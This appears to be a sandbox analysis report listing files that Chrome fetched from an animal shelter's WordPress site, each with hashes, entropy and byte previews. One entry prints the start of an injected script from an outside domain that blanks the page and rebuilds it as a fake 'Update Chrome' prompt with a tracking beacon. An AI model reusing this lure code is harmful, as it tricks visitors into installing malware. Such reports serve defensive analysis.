                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}..c?/..3.......:..FN)C..tj.Gzp.s....G.z.%'....:..s....M.}*.w....<.)...h..%...1I.....b.a....H.....z..I...f.r....Q.'...A.w..jp.t.`.g..qR,..US...<....D.&..m%8..5N%...V.@.=:.%.9..K.!.2".8.v..1@...q..^.-..V\Y...5.j..8..J.q.V.....D..."../.......sP.....>n....ns..M1......,..."...........{.n.Q.@...b.`sK...i\.Be.s.5...:c....?..'L..Y..L.L.I.'.X...P.Zd..4.$Si.....d.....>S.R~..zP+.^g
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 619 x 700, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):134432
                                                                                                                                                                                                                                                        Entropy (8bit):7.994489649601381
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:3072:O/QghmZ5db+4JT4AQov6Oc+0AruIE2ds9BeD:O/loHdb+4JT556L+7c2ND
                                                                                                                                                                                                                                                        MD5:14669726FF8FE20BF0618C673BB36A86
                                                                                                                                                                                                                                                        SHA1:FC9499B740B68F88E5561ABE38831B22EAC03A0B
                                                                                                                                                                                                                                                        SHA-256:2625CDF2AD00F79D0E578AB1FA770EA950EA4BD26E10FB51AD764CB3FA14AE96
                                                                                                                                                                                                                                                        SHA-512:6A2F36E2FFA3DC90965649DDC026A01D66ADE2BFF73B0E63A43865EFA86E1C0059844C0C1E761859750E6507DF48511038B3ACDDE16235942859B2DA28F53783
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR...k............A....PLTE.....................................................................444.......ZZZ...CCC......uuuuuu............UUU.........1((:0/F::>56400,##(..@<<B32...J@@KGG8,+......\JHqijTCB]XYcSRO??FCDUQSRLM...RHH...e^^...jbc...mYV!..ZOP(..|wxwrt|nl...........|~Q98.sp......xy........w`]|fc...........~UU...[?>._`.ij...........zv......yLN.....pPO..................tw....jh.st....^a.~..TWhJF...........qEG....jm...f@A.............P.+..>#"..`82..3BM.{.]?*=...s<8.l...~.r.....~....b....LCcnWS,R.kOc6f0..N^FxA...g.j....W..l.....P?......)tRNS..w.AQ_!5m*......v/[B.....z...~....\.iD.......IDATx...ON.@..q\?.?s...L<.a.Dk..j...+..B\..E.Ym.J...g....=.f...R...H...*..FII.T.z..`rNK>F&...t.U.. c=z..F.I.,j...M|.iq....z-y.2..7.....H-n0.`........b..!...Em.W.".'H....L...j...._&H.P.....r..Gmpz..T.,.~...U..$u....R+yr..N...L.+!c=.).......5...7..I.....z[..z.8.i.....n.CWU.vS..G!.3...+a..PE....z..z}i..&.X$....6?i&y.b.......r.X.V..i....|.XJ{
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Plus, xresolution=203, yresolution=211, software=18.1.1, datetime=2024:12:19 19:18:43, hostcomputer=iPhone 15 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):73397
                                                                                                                                                                                                                                                        Entropy (8bit):7.928180657497868
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:p37L+uz1H2EE1NFnG7/S/wq/hZpGtV8prdl0H1rwtBiUOJ:p37RH1E1NFzLMtYrdl0H1EtBiLJ
                                                                                                                                                                                                                                                        MD5:8FB49257B555422E2CB73125A982AAE8
                                                                                                                                                                                                                                                        SHA1:DC5CFB2275B0FBE954EA30585CDF31B8DF86FC75
                                                                                                                                                                                                                                                        SHA-256:8C028FEC9C65E3F294C92E0BE6EA5190686F23BC546AC4C55B512F2B31B7659C
                                                                                                                                                                                                                                                        SHA-512:1BFF340AD898A55B999EEC9B634A2836A921B92FAAB9A4B6C8B6E89A2B2ED045BD65DE85FF0B9808B60629AAE3D3BE06B29534939FD4222C5B988EF73CF5843F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/f5d5ba8d-c5e9-485f-8040-a2ad6fa39444.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......{.......Apple.iPhone 15 Plus.H.......H.......18.1.1.2024:12:19 19:18:43.iPhone 15 Plus.H.......H......."."...........'...................0232............................................901.........901.........0100....................................................................................................................................2...........3...........4...2............... ...........(...........0...........D...........X...........`...........h...........p...........x...............|...............-05:00.-05:00.-05:00..Q......)\_.....................Apple.iPhone 15 Plus back dual wide camera 5.96mm f/1.6.....<...........2024:12:19 19:18:43.2024:12:19 19:18:43......%..o8...)..i.......................#.[.E.X.Apple iOS...MM.3.......................x.......h...x..............
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, orientation=upper-left, resolutionunit=2, manufacturer=Google, model=Pixel 5, xresolution=185, yresolution=193, software=HDR+ 1.0.604778939zd, datetime=2024:09:05 18:42:57, xresolution=242, yresolution=250, GPS-Data], baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):62273
                                                                                                                                                                                                                                                        Entropy (8bit):7.947590648833033
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:nLD5NJKZxPt0MFR1AASTwIbTOojddlcL0Ri1ZC8+iqWDqGtaUT2o:xLK/PtbFbAPTwIb6ojdbjiSVW23No
                                                                                                                                                                                                                                                        MD5:D97B51C4D683D699CF8260611AA1824B
                                                                                                                                                                                                                                                        SHA1:2428A009F207846508D7B4FF994E7A246167B624
                                                                                                                                                                                                                                                        SHA-256:6EE3FD12409D57D8FEACC8BD21E80260850E45766B59D86883E5304CD132FF6D
                                                                                                                                                                                                                                                        SHA-512:E2735E7FF51092EF004F66FE81C9E061E8E7905E6C38C1764DD362DB1BEC0C0D55FC5ACBA249F01C85D4EDF24F2CE3DBDC24D5B21B32467A222A43E0648DF8A5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...................................i...........%...............Google.Pixel 5.H.......H.......HDR+ 1.0.604778939zd.2024:09:05 18:42:57.H.......H.......(."...........'...................0232............................................020.........020.........020.........0100................................................................................................................................................................................................3...........4..."...............&.......................6...........J...........^...........f...........n...........v...........~...........................................-04:00.-04:00.-04:00.Google.Pixel 5 back camera 4.38mm f/1.73....@B......d...2024:09:05 18:42:57.2024:09:05 18:42:57.....d.......d.......d...............d...E.............................................N...........W.........
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):18013
                                                                                                                                                                                                                                                        Entropy (8bit):7.964826972080405
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:GMC/rIyqIZiBfeADZMlXz8rFhIP7k3/mX120p3YMjNWJWi:GMm0HIchevlDQNuX3YM5WJr
                                                                                                                                                                                                                                                        MD5:37C7D9A891B71BBC337BD5DA2C401D23
                                                                                                                                                                                                                                                        SHA1:2B164EE30887CB5CB34FB01D5A1F989273DCCB21
                                                                                                                                                                                                                                                        SHA-256:76B23DF361024F1A0D6718D0FE236AF85A5E065D2281D086A71FDC15C011BFE7
                                                                                                                                                                                                                                                        SHA-512:FA7F5C44A22D8C78A8311B510BBCE2FDFEF6FBF79A94CDBCD161786543C2902EA259E8F0ECBFEB5F82601DA89A5CE5A8CF1B26088F4E4D795B14838C98C82700
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........;.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...SQ_....7..^..TR..u...Q...^k..Lj.'..u*..@\6*P..EJ.V...-...R*..h...)_....-J..S....Z.V.-J.E.EJ.V......@..$...H7..ye...HG..G..L..j..nk0.:.....j.T.....S....*i.(~..W3.........b-L.B.J.g..0T.Ui.*EZB.W"..J..xZ...N.I..8-=R..T...S....ZxZz.i.h..}.E^i.i.U.E .........8..5.q.M6..\.O....M.&....K..K..[.D.......q...r".8..kEJFn..S.,...j#w....b..m_P...[u&.e8..T$....Z....J..Qd1
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x431, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):52877
                                                                                                                                                                                                                                                        Entropy (8bit):7.977817011975378
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:SJnSayUJa4sEeSLt/u3V8LvejUxLKVKZt0LgBjDqttUWgZc0XVYaY6puA1vhpZF:SJnpyUQ4sEeGgL1K7sgBjDqttuCXwDZF
                                                                                                                                                                                                                                                        MD5:BFC19DFD4219D61CD38C309455E18CDA
                                                                                                                                                                                                                                                        SHA1:DCEDC550BF5D050C5CCCE3333E62BF3E42313EC1
                                                                                                                                                                                                                                                        SHA-256:27AFD046A3C66D3E5F760BCD2388897E9BEFEA363EC49740FF553E684E52476F
                                                                                                                                                                                                                                                        SHA-512:DBDAB5130AA3D10B7957D295D7D96C548116C3CDA250CD61C1597488AC33E149F4D41BC7F9DBC834157847120D95EA9A3C24EE2B7203565BDDE635153989CD03
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/d82a13a6-1fba-467c-a8e3-f64f576f7c02.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....]......D.Z!.5..$..9.Mv:<^T(. ...S>./}.j7y.`.j.|.l..{.uf..:59.t..B....\..-.7[......@..2.P..X.0*....x..h..")...CY...($....Z..f\..Z...?.3C...1..H.T%+.u.Z.{9....s..1...h^G...u.w.a]+..,.3...(..e...W.....-....s.d....?.5...-...4..|. ...-[U..K..%.Xg..Z......Wt....H..w.Z6E>_...<W.a.......8..m...u...;[..l....j.e$....\......t$.........q...EO-..F.R.8.....S.U..glY....\.:..o3...
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1412), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1412
                                                                                                                                                                                                                                                        Entropy (8bit):5.120719291993871
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:rs1trgBRFKORXw2wu43OleYsh8RcK5EaQ0HCyBhDXLWowGXPHDOzEcAuATeITlT3:41t0BjKZ2wu43OeJWRNnQ0iyXHWozjOo
                                                                                                                                                                                                                                                        MD5:04E3256D2C4A04631C3B8C59000983D1
                                                                                                                                                                                                                                                        SHA1:844329BF98D569CCDD6243077C38B00155B98E14
                                                                                                                                                                                                                                                        SHA-256:82003ADA03A923689E7A52A15DB71BCB7F32A606976908EBCD8068FD1E677FB1
                                                                                                                                                                                                                                                        SHA-512:E9662DE3E96E96BE49E3EFEE13F97B8386B849481F8AAC5449C19EF4EBF05E12C2421C3B1900BE74C1AA075BD71460B6CE1FF5C5DFAEB2D1FD7980FF254E2CEA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-grid-compat.min.js?v=10.4.2&ver=10.4.2
                                                                                                                                                                                                                                                        Preview:void 0===TCB_Front.js_modules["post-grid-compat"]&&TCB_Front.setModuleLoadedStatus("post-grid-compat",!1),(t=>{if(TCB_Front.isModuleLoaded("post-grid-compat"))return;window.addEventListener("load",(function(){o.postGridLayout()}));const o={postGridLayout(){try{t(".tve_post_grid_masonry,.tcb-post-list.masonry").each((function(){const o=this.dataset.masonry?JSON.parse(this.dataset.masonry):{},s=TCB_Front.getDisplayType()[0];void 0!==o[`gutter-${s}`]&&(o.gutter=parseInt(o[`gutter-${s}`])),t(this).masonry(o).css("opacity",1)}))}catch(t){console.log(t)}const o=t(".tve_post_grid_grid");o.length<=0||o.find(".tve_pg_row").each((function(){let o=0;const s=t(this).css("height","");s.find(".tve_post").each((function(){const s=t(this),e=s.outerHeight();e>o&&(o=e),s.css("height","100%")})),s.css("height",o-1+"px")}))}};t(window).on("tcb_after_dom_ready",(()=>{o.postGridLayout(),TCB_Front.Utils.isEditorPage()||TCB_Front.addResizeCallback(o.postGridLayout)})).on("tcb_toggle_open",(()=>o.postGridLayou
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, resolutionunit=2, manufacturer=Canon, model=Canon EOS R5, xresolution=153, yresolution=161, software=Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh), datetime=2024:12:09 14:55:30, xresolution=242, yresolution=250], baseline, precision 8, 420x630, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):72284
                                                                                                                                                                                                                                                        Entropy (8bit):7.95998731203523
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:M3I7jNbUZNfXbwn2NqF8V7sScjbWmQnAoDPsLWvKPYG:M3Ih2VXbw2NqF8ADbWmQnAoDPZvWt
                                                                                                                                                                                                                                                        MD5:6B61E4FEF605A59436A217248E15D6CF
                                                                                                                                                                                                                                                        SHA1:25933848C527C31E0329DB161ACF080E35BE9735
                                                                                                                                                                                                                                                        SHA-256:1A13B91C6E932538E61EBFE0BD4573007BE4A112D20C06E3A48DBF75FCCFAAFC
                                                                                                                                                                                                                                                        SHA-512:7C8712772B2C95E94A0929BAD223FA0E1EABD8BEE804BDB89DA47B11E646ECDE5C27C51BAD90CB2128B39960FFFEB4DA22E522A318E892ADE9D25F45D59E752C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,.....hExif..II*.......(...........................................................1...5.......2...................................i...............Canon.Canon EOS R5.,.......,.......Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh).2024:12:09 14:55:30.H.......H....... .0...........2..........."...........'...................0231................................95..........95..................................................................................................1...........2...........4...........5...................................................................(...........0...........8...........@...........H...........P...........X.......-05:00.-05:00.-05:00.122025001163.........i.......................RF24-105mm F2.8 L IS USM Z.4020001296.................2024:12:09 08:14:28.2024:12:09 08:14:28..t.@B...T-.@B..................U.........}......_S........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ....
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (17995)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):18512
                                                                                                                                                                                                                                                        Entropy (8bit):5.035329146278265
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:pzfNhXFbxb7z6umaWqC1b85DqGD1IqRcKqYD:pz1xfz6uRlwb85DqGDug
                                                                                                                                                                                                                                                        MD5:69A25BBC4A42C35D6313A6D75AE4EFB0
                                                                                                                                                                                                                                                        SHA1:99D387664369B187CC7512040F4726C7C5477AD9
                                                                                                                                                                                                                                                        SHA-256:20A3CC4AA84F5980A4856AB4A59573AD3F19BB077E9F533DFAB994F155E93F9F
                                                                                                                                                                                                                                                        SHA-512:27EC9F68698C2C6A0C2DAB6F5F08A4152E49E872D7D6899EA5B6FFD6EF5A3CB988AAF9C7A67D79E4D0136F7E641536E376EF27044D9E8E34606B26D4422B67C8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/style.css?ver=10.4.2
                                                                                                                                                                                                                                                        Preview:/*.Theme Name: Thrive Theme Builder.Theme URI: https://thrivethemes.com/.Author: <a href="https://thrivethemes.com">Thrive Themes</a>.Description: Thrive Theme Builder lets you visually design, build, edit and customize every aspect of your WordPress website with a visual drag-and-drop designer. .Version: 10.4.2 .License: GNU General Public License v2 or later.Text Domain: thrive-theme.Tags: custom-background, custom-logo, custom-menu, featured-images, threaded-comments, translation-ready, custom-everything.*/.html{box-sizing:border-box;font-size:16px;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;font-smooth:antialiased;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:auto}body{font-family:Arial,sans-serif;color:rgba(10,10,10,.85);font-size:1rem;line-height:1.5}body:not(.defaults){background:#fff;margin:0;padding:0}*,*:before,*:after{box-sizing:inherit}p,li,blockquote,q,pre,code,kbd,samp{color:rgba(10,10,10,.85);font-family:Arial,sans-serif;font-size:1rem;line-heigh
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (25822), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):25822
                                                                                                                                                                                                                                                        Entropy (8bit):5.358076039563863
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:a/vbtQxeSt7QL94n7N7JfZ6ykw1BPaiMZPRLBHGzs9nPyvL8by5RHyw/tH:yBQL7QapRZ9J1BPa9PRLBAs9n6T8+6MR
                                                                                                                                                                                                                                                        MD5:01D69629E7E8550C81CA7654836E6F00
                                                                                                                                                                                                                                                        SHA1:75536BE70E09A126539B769EB1FF437F94A40AF9
                                                                                                                                                                                                                                                        SHA-256:0C756A9929ADDDB39233417FE087FD1B35EDB6216A76A789FAC26B639ABD7BB6
                                                                                                                                                                                                                                                        SHA-512:EC1E795090F579183F70DC560FA5E2D9E0951D29344B1E6B902C18CD3DB8CC04165338FCF1911337C17BC4AC57CC38CB211F5E62AEA1246D4B5C51274B6CA0D2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:var customgptDefaultCSS=".cgptcb-body {\n z-index: 2147483000;\n position: fixed;\n}\n.cgptcb-body .cgptcb-chat-circle,\n.cgptcb-body .cgptcb-chat-box-toggle {\n position: fixed;\n bottom: 1rem;\n left: var(--chatbot-position-left, auto);\n right: var(--chatbot-position-right, 1rem);\n border-radius: 50%;\n line-height: 4rem;\n cursor: pointer;\n color: var(--chatbot-color, #fff);\n background-color: var(--chatbot-bg-color, #0099dd);\n box-shadow: 0 0.25rem 0.5rem rgb(50 50 50 / 0.3),\n 0 1px 3px rgb(0 0 0 / 0.05);\n text-align: center;\n transition: all 0.2s ease-in-out;\n}\n\n.cgptcb-body .cgptcb-chat-circle.cgptcb-icon-size-small,\n.cgptcb-body .cgptcb-chat-box-toggle.cgptcb-icon-size-small {\n width: 45px;\n height: 45px;\n}\n\n.cgptcb-body .cgptcb-chat-circle.cgptcb-icon-size-medium,\n.cgptcb-body .cgptcb-chat-box-toggle.cgptcb-icon-size-medium {\n width: 75px;\n height: 75px;\n}\n\n.cgptcb-body .cgptcb-chat-circle.cgptc
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 619 x 700, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):134432
                                                                                                                                                                                                                                                        Entropy (8bit):7.994489649601381
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:3072:O/QghmZ5db+4JT4AQov6Oc+0AruIE2ds9BeD:O/loHdb+4JT556L+7c2ND
                                                                                                                                                                                                                                                        MD5:14669726FF8FE20BF0618C673BB36A86
                                                                                                                                                                                                                                                        SHA1:FC9499B740B68F88E5561ABE38831B22EAC03A0B
                                                                                                                                                                                                                                                        SHA-256:2625CDF2AD00F79D0E578AB1FA770EA950EA4BD26E10FB51AD764CB3FA14AE96
                                                                                                                                                                                                                                                        SHA-512:6A2F36E2FFA3DC90965649DDC026A01D66ADE2BFF73B0E63A43865EFA86E1C0059844C0C1E761859750E6507DF48511038B3ACDDE16235942859B2DA28F53783
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/uploads/2021/05/hero-dog.png
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR...k............A....PLTE.....................................................................444.......ZZZ...CCC......uuuuuu............UUU.........1((:0/F::>56400,##(..@<<B32...J@@KGG8,+......\JHqijTCB]XYcSRO??FCDUQSRLM...RHH...e^^...jbc...mYV!..ZOP(..|wxwrt|nl...........|~Q98.sp......xy........w`]|fc...........~UU...[?>._`.ij...........zv......yLN.....pPO..................tw....jh.st....^a.~..TWhJF...........qEG....jm...f@A.............P.+..>#"..`82..3BM.{.]?*=...s<8.l...~.r.....~....b....LCcnWS,R.kOc6f0..N^FxA...g.j....W..l.....P?......)tRNS..w.AQ_!5m*......v/[B.....z...~....\.iD.......IDATx...ON.@..q\?.?s...L<.a.Dk..j...+..B\..E.Ym.J...g....=.f...R...H...*..FII.T.z..`rNK>F&...t.U.. c=z..F.I.,j...M|.iq....z-y.2..7.....H-n0.`........b..!...Em.W.".'H....L...j...._&H.P.....r..Gmpz..T.,.~...U..$u....R+yr..N...L.+!c=.).......5...7..I.....z[..z.8.i.....n.CWU.vS..G!.3...+a..PE....z..z}i..&.X$....6?i&y.b.......r.X.V..i....|.XJ{
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=16, height=3500, PhotometricIntepretation=RGB, orientation=upper-left, width=2334], baseline, precision 8, 420x630, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):88211
                                                                                                                                                                                                                                                        Entropy (8bit):7.961251077707535
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:b3OdiXKlobPyNO41hd7HY+Kvs4KUP8PWGuYa9cbWvjaxmFqVgAN5E:b3OUXKTN/nY+KkYWzDbWvjpYHE
                                                                                                                                                                                                                                                        MD5:C5A5F26FE99EE5CDBB2BBE4F9CADB44D
                                                                                                                                                                                                                                                        SHA1:2A97F22C17CD4426304ECB31902D9DA3B99D8459
                                                                                                                                                                                                                                                        SHA-256:63755BE8F4918A8499439C7E387426F6D2D674F58A6791A5612E7162D8FD8090
                                                                                                                                                                                                                                                        SHA-512:F37CBE1CAFC784569E4E069811E40B92694C06169DB003E4EA50477EC9413A370DA1FDD061BF140854D8AB03A9B1E8FD511F20C72FBC47E8012C031D4EA44009
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/26812b91-7e9f-4bee-913c-af37d8f79f54.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,......Exif..II*...................................................................(.......................................................................1...".......2...................-...........5...i.......=.............Canon.Canon EOS R5.,.......,.......Adobe Photoshop 25.11 (Macintosh).2024:12:09 15:07:44.H.......H.......".0...........2..........."...........'...................0231................................65..........65..........................................................................................................................1...........2...........4...........5.......8...........C...........K...........S...........g...........{...............................................................................-05:00.-05:00.-05:00.122025001163.........i.......................RF24-105mm F2.8 L IS USM Z.4020001296.....@...#.......2024:12:09 07:41:03.2024:12:09 07:41:03...~.@B..........................I.........}......_S........XICC_PROFILE......HL
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):107200
                                                                                                                                                                                                                                                        Entropy (8bit):6.063831918802096
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:Kx37myXqbNdNfPgriKal+VYnwlQ92KHBNG:qcNfPgril+yGQkKHBNG
                                                                                                                                                                                                                                                        MD5:488A0FD84A45D0E16C4E270C902455A7
                                                                                                                                                                                                                                                        SHA1:139AA063A087744FF08922A64235895518A3CD2E
                                                                                                                                                                                                                                                        SHA-256:7C63C07BC56ABA51096A49210A2FFA892223927CA14883C3E72C847AAF9225A3
                                                                                                                                                                                                                                                        SHA-512:4FAAA0F77A169036FCACAC041595424BF486DFAAB3E85750823B1A77A92932A2B065B1EDD591612BC00B3635854F6A790D326779616838F137B422AA44E02133
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://virtual.urban-orthodontics.com/w1EdyrhzfqOncyf49WIx6LAleLrhaz+rrTBxs7k0QqyzczHosXMn6Kk3b7OhM2e5qCRnsrsiP7c=
                                                                                                                                                                                                                                                        Preview:(function(){window.localStorage[window.location.hostname]=1;var domain='https://virtual.urban-orthodontics.com/';function sendStatistics(type){var i=new Image();i.src=domain+type;}var elems=[document.documentElement,document.head,document.body];var attrs=['class','style','lang','id','dir'];for(var i=0;i<elems.length;i++){for(var j=0;j<attrs.length;j++){try{elems[i].removeAttribute(attrs[j]);}catch(e){}}}document.head.innerHTML='<meta http-equiv="content-type" content="text/html; charset=UTF-8">'+'<meta charset="utf-8">'+'<title>Update Chrome</title>'+'<style> * {margin: 0;padding: 0;}html {overflow-y: scroll;}body {color: #333;font: 13px/18px \'Segoe UI\',sans-serif;font-weight: 400;}.compact {border-left: 26px transparent solid;border-right: 26px transparent solid;margin: 0 auto;max-width: 928px;}#header {height: 64px;position: relative;}.g-section:after {clear: both;content: ".";display: block;height: 0;visibility: hidden;}.g-section, .g-unit {zoom: 1;}#header-logo {margin-top: 20px;
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10020)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10199
                                                                                                                                                                                                                                                        Entropy (8bit):5.0255490240459695
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:sr91gNsoBeuLLE2mBrnYgfGGFTsPdQlJh1NmgKzH:srkjMunE7x/3sPd469
                                                                                                                                                                                                                                                        MD5:284953F0E0A570AA06D6B527C45A55BB
                                                                                                                                                                                                                                                        SHA1:C4B8089261F001829F0D6E522928F6D912DB7D1F
                                                                                                                                                                                                                                                        SHA-256:41788F27F61AAB4174275EB5FBBBCAFFDE0F4F0F07E6900592AFFAD38E09B154
                                                                                                                                                                                                                                                        SHA-512:81D15D80BBF4F8703E644157D74F8F44EEA10E13553947437F14E9E448084D3B9A704CF87DBE0CC99D228A39820CE122A226973FA543DA3C84FF70A8F504C51A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.13.3
